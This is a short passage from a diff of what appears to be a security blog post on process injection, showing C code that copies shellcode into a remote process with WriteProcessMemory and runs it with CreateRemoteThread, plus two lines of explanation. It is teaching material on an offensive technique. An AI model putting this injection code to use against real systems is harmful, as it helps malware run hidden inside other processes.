Coppertop-6/coppertop-6.github.io/_posts/2023-03-14-Process_Injection.md

 WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
 ```

+Now that our shellcode has been copied into the memory space of the remote process, we just need a way to trigger the execution of that code.
+We can use the ```CreateRemoteThread``` API and specify the remote process and pointer to the code buffer we want executed.

 ```c#
 hThread = CreateRemoteThread(hProc, NULL, 0, pRemoteCode, NULL, 0, NULL);
 if (hThread != NULL) {